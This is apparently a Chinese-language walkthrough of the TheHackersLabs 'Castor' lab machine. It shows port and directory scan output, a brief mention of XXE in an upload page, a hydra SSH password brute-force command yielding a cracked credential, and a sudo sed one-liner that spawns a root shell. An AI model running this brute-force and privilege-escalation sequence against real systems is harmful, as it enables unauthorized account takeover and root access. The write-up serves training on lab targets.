TheHackersLabs-Castor

Castor

靶机地址：https://labs.thehackerslabs.com/machine/165

192.168.100.24

‍

信息搜集

端口扫描

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 192.168.100.24                                                       [12:47:22]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned my computer so many times, it thinks we're dating.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.24:22
Open 192.168.100.24:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 12:47 CST
Initiating ARP Ping Scan at 12:47
Scanning 192.168.100.24 [1 port]
Completed ARP Ping Scan at 12:47, 1.43s elapsed (1 total hosts)
Nmap scan report for 192.168.100.24 [host down, received no-response]
Read data files from: /usr/share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 1.49 seconds
           Raw packets sent: 2 (56B) | Rcvd: 0 (0B)

‍

80/tcp目录扫描

root@LAPTOP-O235O5EH [~] ➜  dirsearch -u http://192.168.100.24                                               [13:13:32]
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.100.24/_26-01-21_13-13-40.txt

Target: http://192.168.100.24/

[13:13:40] Starting:
[13:13:40] 301 -  313B  - /js  ->  http://192.168.100.24/js/
[13:13:42] 403 -  279B  - /.htaccess.bak1
[13:13:42] 403 -  279B  - /.htaccess.sample
[13:13:42] 403 -  279B  - /.htaccess.save
[13:13:42] 403 -  279B  - /.htaccess_extra
[13:13:42] 403 -  279B  - /.htaccess_orig
[13:13:42] 403 -  279B  - /.htaccessBAK
[13:13:42] 403 -  279B  - /.htaccess_sc
[13:13:42] 403 -  279B  - /.htaccessOLD
[13:13:42] 403 -  279B  - /.htaccessOLD2
[13:13:42] 403 -  279B  - /.htm
[13:13:42] 403 -  279B  - /.html
[13:13:42] 403 -  279B  - /.htaccess.orig
[13:13:42] 403 -  279B  - /.htpasswds
[13:13:42] 403 -  279B  - /.httr-oauth
[13:13:42] 403 -  279B  - /.htpasswd_test
[13:13:42] 403 -  279B  - /.ht_wsr.txt
[13:13:43] 403 -  279B  - /.php
[13:13:49] 403 -  279B  - /cgi-bin/
[13:13:51] 301 -  314B  - /css  ->  http://192.168.100.24/css/
[13:13:58] 200 -  451B  - /js/
[13:14:03] 403 -  279B  - /server-status/
[13:14:03] 403 -  279B  - /server-status
[13:14:05] 301 -  318B  - /uploads  ->  http://192.168.100.24/uploads/
[13:14:05] 200 -   16B  - /upload.php
[13:14:05] 200 -  407B  - /uploads/

Task Completed

‍

castorcin shell

/upload.php xml not provided

上传一个xxe看下

可以看到确实是xxe注入。

castorcin是唯一一个用户，hydra尝试爆破密码

hydra -l castorcin -P /usr/share/wordlists/rockyou.txt 192.168.100.24 ssh -t 4 -vV

castorcin:chocolate

‍

提权

castorcin -> root

castorcin@TheHackersLabs-Castor:~$ sudo -l
sudo: unable to resolve host TheHackersLabs-Castor: Nombre o servicio desconocido
Matching Defaults entries for castorcin on TheHackersLabs-Castor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User castorcin may run the following commands on TheHackersLabs-Castor:
    (ALL : ALL) NOPASSWD: /usr/bin/sed

/usr/bin/sed拥有sudo权限

在gtfobins里面有现成的提权方案 https://gtfobins.org/gtfobins/sed/

sudo  /usr/bin/sed -n '1e exec /bin/sh 1>&0' /etc/hosts

‍